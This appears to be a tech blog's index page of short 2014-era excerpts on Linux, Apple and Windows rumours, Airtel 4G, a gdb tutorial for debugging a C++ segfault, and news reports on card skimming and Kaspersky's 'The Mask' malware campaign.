Fig.1: My pretty Bohdi desktop.
Bodhi is based on Ubuntu LTS and takes a minimalist approach: minimum system requirements are 300+MHz CPU, 128MB RAM, and 2.5GB hard drive space, and it installs with a bare minimum set of packages. Then you make it your own. Sharing artwork is a big part of the Bodhi community, with something for everyone.

Read More

Is Apple Ditching The iPhone 5C?

The iPhone 5C has not been as popular as Apple had anticipated, with Tim Took himself admitting that sales were lower than expected. Now, news has surfaced that in September two new iPhones will be released and at the same time the 5C will be ditched.
According to reports from the South China Morning Post, the iPhone 6 will sport a 4.7-inch screen and a second model will have one measuring 5.5-inches. There still seems to be uncertainty surrounding what the displays will be made from, with some sources saying Apple will use sapphire crystal, while others say the tech company can’t afford this toughened material.
 

The news that Apple will do away with the iPhone 5C, has also resulted in a rumour that the 5S will actually become the ‘cheaper handset’, being produced from cheaper materials.
The question is, if Apple make the 5S from cheaper materials, is it still a 5S or does it just then become a 5C without the colourful cases?
Either way this is just a rumour and so far nothing has been confirmed
Read More

What is Unix and Why Does It Matter?

Most operating systems can be grouped into two different families. Aside from Microsoft’s Windows NT-based operating systems, nearly everything else traces its heritage back to Unix.
Linux, Mac OS X, Android, iOS, Chrome OS, Orbis OS used on the PlayStation 4, whatever firmware is running on your router — all of these operating systems are often called “Unix-like” operating systems.

 Unix’s Design Lives On Today.

Unix was developed in AT&T’s Bell Labs back in the mid-to-late 1960′s. The initial release of Unix had some important design attributes that live on today.One is the “Unix philosophy” of creating small, modular utilities that do one thing and do them well. If you’re familiar with using a Linux terminal, this should be familiar to you — the system offers a number of utilities that can be combined in different ways through pipes and other features to perform more complex tasks. Even graphical programs are likely calling simpler utilities in the background to do the heavy lifting. This also makes it easy to create shell scripts, stringing together simple tools to do complicated things.

Unix also had a single file system that programs use to communicate with each other. This is why “everything is a file” on Linux – including hardware devices and special files that provide system information or other data. It’s also why only Windows has drive letters, which it inherited from DOS — on other operating systems, every file on the system is part of a single directory hierarchy.


Read More

Apple, Google rejecting apps with 'Flappy' in title


Following the removal of the Flappy Bird app from online stores by its creator Dong Nguyen, Apple and Google are having a rough time turning down gamers, mimicking the popular game by adding "Flappy" to their creations.
The App Store's top charts are overflowing with clones of this year's viral hit "Flappy Bird" which was taken down by Nguyen after he had trouble handling the sudden fame.
According to TechCrunch, Apple rejected an app called "Flappy Dragon" created by a Vancouver-based game designer Ken Carpenter of Mind Juice Media, saying that his app attempted to leverage a popular app and was in violation of the App Store Review Guidelines.
Apple cited reason for rejecting the app and said that as per the guidelines, apps that contain false or misleading representations will be rejected.
Read More

Airtel’s Bangalore 4G rings only on Apple iPhones


10 GB of data at 4G speeds will cost Rs 1,000 
Airtel has launched 4G services in Bangalore, but limited it to those using the latest Apple iPhones, the 5c and the 5s. India’s largest private telecom operator, says its services will enable users in India’s tech capital to stream high definition video with zero buffering. while these are 4G services, the Apple iPhone users have the added advantage of having to pay only 3G rates for the same.
Customers will have to upgrade to a 4G SIM to enjoy the higher speeds, but will not have to change their existing data plan, Airtel said. The company claims the speeds will be so fast that you can download 10 movies in less than 30 minutes and use the wi-fi hotspot features in these phones effectively connecting multiple devices to the network.
Customers on 2G/GPRS data plans/packs can opt for any of the 3G plans/packs available and enjoy 4G speeds, Airtel said. For heavy data users there is a new plan offering 10 GB of data at 4G speeds for Rs 1,000. However, remember that at 4G speeds, you can exhaust this limit within a few hours if not careful.
Incidentally, the company said that while data browsing will be on 4G network, voice calls will be routed on 2G/3G with the CSFB (circuit switched fall back) technology.
Read More

How to Debug a C++ Crash in Linux

For anyone who has done C or C++ development in Linux, debugging crashes is a critical part of the job. In this post, I’ll start with the basics of getting stack traces using gdb and core files.
Debugging a Crash in gdb


When your program is crashing you need to know where the problem occurred.  Running your program interactively in a debugger, such as the GNU Debugger (gdb), will give you a stack trace when the crash occurs.  If you have compiled your program with debugging enabled (the -g compiler option), then you will get a meaningful stack trace.

Consider the following code that deliberately generates a segmentation fault:
#include <stdlib.h>
void causeAnError (char& a)
{
        char* p = NULL;
        a = *p;
}
int
main (int argc, char *argv[])
{
        char ch;
        causeAnError (ch);
        exit (0);
}
Compiled with “g++ -o debugTest main.cpp” gives the following output in gdb:
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400618 in causeAnError(char&) ()
(gdb) bt
#0  0x0000000000400618 in causeAnError(char&) ()
#1  0x000000000040063e in main ()<p>Program received signal SIGSEGV, Segmentation fault.</p>

That narrows it down to the function where the error occured, but doesn’t tell you the line number.  Adding the “-g” compiler option will not only give you the line number, but will even print out the offending line:
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400618 in causeAnError (a=@0x7fffffffe06f) at main.cpp:6
6  a = *p;
(gdb) bt
#0  0x0000000000400618 in causeAnError (a=@0x7fffffffe06f) at main.cpp:6
#1  0x000000000040063e in main (argc=1, argv=0x7fffffffe158) at main.cpp:13
Debugging a Crash Using Core Files
Now suppose you are testing your application on a different machine than where you write and compile your code.  If gdb is not available, you can configure your Linux system to generate a core file.  A core file is generated when a program terminates abnormally; it records the state of the registers and memory at the time of the termination.  Once you have a core file you can transfer it to your development machine and feed that into gdb. 

Most Linux systems have core file generation disabled by default.  To enable it, with no limit to the core file size, type “ulimit -c unlimited”.  When your program generates a segfault, it will produce a file called core in the same directory as your program.  On your development machine, run “gdb <program name> core”.  If the program was compiled with debug symbols, then the output will be similar to what you see when running the program interactively in gdb:
Core was generated by `./debugTest'.
Program terminated with signal 11, Segmentation fault.
#0  0x0000000000400618 in causeAnError (a=@0x7fffbb679def) at main.cpp:6
6  a = *p;
Read More

From the rumor mill: Windows 9 to hit Beta in May of this year, Release Candidate close to September

 Microsoft is currently set to roll out Update 1 for Windows 8.1 soon and now rumors are circulating yet again about the next version of Windows - currently known as Windows 9. This information comes from Wzor, the man responsible for the recent Windows 8.1 Update 1 leaks. We're going to label it as a rumor for now, for obvious reasons.

According to Wzor, Windows 9 will reach Beta in May of this year. This will be the only Beta version of the operating system. A Release Candidate build of Windows 9 will then arrive sometime between late August and September of this year. Sign-off for the final build of Windows 9 will take place sometime between the end of October to the middle of November. Wzor is sticking to his claim that Windows 9 will hit RTM between October 21st and October 25th.

However, the well-connected Mary Jo Foley over at ZDnet recently said she heard from her sources that Windows 9 Threshold RTM will not hit RTM in October 2014, as rumored by Wzor. According to Mary Jo Foley, "By the way, for what it's worth, I'm hearing from my sources that WZor's claims this week that Threshold will be released to manufacturing in October 2014 are inaccurate. Maybe he's hearing about something like another Windows 8.1 Update."

Microsoft is expected to introduce a plethora of new features including floating modern apps as well as some sort of "mini" Start Menu, but it seems they'll not be a part of the Windows 8.1 Update 1, according to Foley. It could, however, make an appearance next year with Windows 9.
Read More

5 Reasons To Get Over The Hype And Start Loving Windows 8.1

You don’t have to look far to find reports that Windows 8 (and the updated Windows 8.1) is an unmitigated failure. A quick search turns up stories detailing why Windows 8 has failed, why Windows 8 continues to fail, as well as one pondering whether or not Windows 8 is Microsoft’s biggest failure ever (Hint: It’s not).


The relative success or failure of Windows 8 has been headline news again this week as reports that HP is bringing Windows 7 “back by popular demand” went viral. Thankfully, there are also some common sense stories that dig past the hype to reveal the reality behind a simple HP marketing campaign.
Read More

10 things Linux does better than Windows

 If you tallied up the strengths and weaknesses of Linux and Windows, which OS would come out ahead? According to Jack Wallen, superiority in security, flexibility, interoperability, community, and command-line power (among other things) put Linux well ahead. See if you agree with his assessment.

http://www.geekyharsha.in/2014/02/10-things-linux-does-better-than-windows.html

 I could list far more than 10 items. But I will stick with the theme and list only what I deem to be the 10 areas where Linux not only does better than Windows but blows it out of the water.
Read More

Six Reasons You Need To Learn Linux

It’s simple: you need to learn Linux. You’ve heard about Linux, you could even be a developer that knows “open source,” but have never used Linux as a server operating system or desktop operating system. Instead of pumping you with the usual Linux superiority reasons, here are six simple and strait-forward reasons you need to learn Linux.


6. It was used in The Matrix
I know you’ve seen The Matrix and let’s face it, it’s just cool. Trinity knows nmap. Some of the operating screens you saw were the Linux command line or GUI interface. Learn Linux and you’ll be able to do cool things like they did in The Matrix. Use Linux on your desktop and create one of the most awesome and unique desktop design layouts known to man. The flexibility is amazing.

5. It’s the last “real” community frontier
What do I mean by this? Simple, nearly everything about Linux is community driven. The software is free, and the initiative is to better the operating system. This means you can learn from other developers in the community and you’re never forced to buy the “upgrade” or “next” version of the operating system. It’s open, as long as you contribute to the community, it can contribute back ten fold.

4. It will increase your geek kung fu
Seriously, EVERYBODY is a “geek” now days. It seems like just using the internet now classifies you as a geek. Well, learning Linux gives you real geek credibility – it’s hard, it’s flexible, it’s open, and it’s primarily command line driven. Your friends running Windows or OSX can’t say that.

3. It’s the most popular server OS on the internet and still growing
Open source is a movement that started years ago but is only now really making inroads in the tech industry. Linux offers low cost servers that can run almost every major web development language available (even c# sometimes). With the availability of cloud computing, the Linux market share is skyrocketing. Know Linux and you’ll be a better freelancer or more “hireable” to potential employers.

2. It’s as customizable…as much or as little as you want
Linux is the open source operating system which all other major open source projects are built from. OSX is built off of BSD/Unix; Google’s Android operating system is built off of Linux; even new versions of Windows servers are being designed to run more lightweight like Linux.

1. SpaceX hires Linux administrators
If you’re not a space nerd, then you have no business here. Who wouldn’t want to work on the next generation of space flight?!
Read More

PayPal President’s Credit Card Hacked

The President of the online payments company PayPal has recently revealed that his credit card information was cloned whilst he was on a trip to the United Kingdom. David Marcus voiced his opinions on the micro blogging social networking website, Twitter.  He tweeted that a ‘ton’ of fraudulent transactions had been carried out via his account following the incident.
Marcus believes his card was ‘skimmed’ whilst he was in the UK.  The process of ‘skimming’ a card is relatively straightforward (which is why it is quite dangerous), information is copied using an external ‘skimming’ device before being printed onto a new card.  The cloned copy can then be used for fraudulent transactions.

 
It is often make possible by means of a device fixed to the front of a point-of-sale terminal or ATM that covertly copies credit and debit card information when customers put their cards into the machines to pay for a transaction or when they withdraw cash.
Marcus took the opportunity to inform people that the crime “wouldn’t have happened if (the) merchant accepted PayPal…Obfuscating card data online, on mobile, and now more and more offline remains one of PayPal’s strongest value props.”
Credit cardsin the US are typically less secure than those of the rest of the globe, because they do not have EMV technology (commonly known as “Chip and PIN”) but Marcus did actually reveal that this was a Chip and PIN type of credit card. He believes the skimming was likely to have happened via cloning of the magnetic strip on his card.
EMV chips, which validate credit and debit card transactions using a “Chip and PIN” machine, mad obsolete the process of signing a credit card receipt in the UK and much of Western Europe some time back now.  The technology has had a slow up-take in the United States however, with a number of companies still using less secure and older, magnetic strip cards. MasterCard has this week confirmed that it will start rolling out Chip and PIN services in the US from October next year, with Visa are also saying that they are looking to implement the technology soon as well.
PayPal has put up with several attacks on its operations of late, most notably; coming under attack, only last week, from the notorious hacker group the Syrian Electronic Army. The SEA carried out the attack on the DNS infrastructure, which served the site.  It redirected users logging onto the service to a web page of anti-US government information.
Read More

Researchers reveal super-spying malware

"The Mask" has gone undetected since 2007


 Security researchers at Kaspersky have uncovered "The Mask", a cyber spying campaign believed to have been started in a Spanish-speaking country.
The campaign is one of the most advanced cyberattack operations ever seen, targeting governments, energy companies and activists in 31 countries around the globe. Going undetected for seven years, it had infected more than 380 targets before being stopped in recent weeks.
Ironically, the malware finally revealed itself when it attempted to hack into Kaspersky Labs, piquing the research team's interest in why it was trying to steal data on hiding viruses in systems.

State-sponsored
With versions capable of infecting Mac OS X, iOS, Linux and Android, the malware is highly sophisticated, leading the research team to believe its development was state-sponsored.
Relying on phishing emails with links to malicious sites, the malware, once successful in infecting a computer, filters all communication to and from the machine as well as scraping vital information.
Kaspersky refused to identify the government suspected to have been behind the spying, but did reveal that The Mask had been most active in Morocco, Brazil, Spain, the UK and France. The discovery, the company stated, could indicate that more countries are developing sophisticated spying programs to combat agencies such as GCHQ and the United States' NSA.
Read More

iWatch Could Generate $17.5 Billion Say Morgan Stanley Analysts


Much of the speculation surrounding Apple’s iWatch has been regarding specs, the design and when it will be released. Now analysts at Morgan Stanley are making predictions as to what return the tech giant can expect to receive once it becomes available.
They claim that the iWatch has the potential to bring in up to $17.5 billion after a year’s sales, that’s assuming that the wearable device has a price tag of $299 and there are plenty in stock. If however Apple struggles to get enough of the product to retailers, then we could see a similar scenario to the iPhone 5s, which ran short, resulting in the iWatch revenue falling to between $10 and $14 billion, which is still not a sum to be sniffed at.

Morgan Stanley explained how they reached that figure by saying: “Our working assumption is that iWatch largely will be adopted as an accessory device and, therefore, sold into the existing customer base, like the iPad, rather than to new customers, like the iPod or iPhone,” the research note said.
So the researchers think that most of the custom will come from existing Apple product owners, who are looking for a high-tech accessory to work with what they already own. It is likely that the smartwatch will also drum up new customers.
Like with all the other rumours and expectations, we will have to wait and see what happens but Apple could certainly do with a boost, especially after its first quarter failed to impress investors. I’m sure Apple are hoping that the Morgan Stanley analysts have got it right on this one.
Read More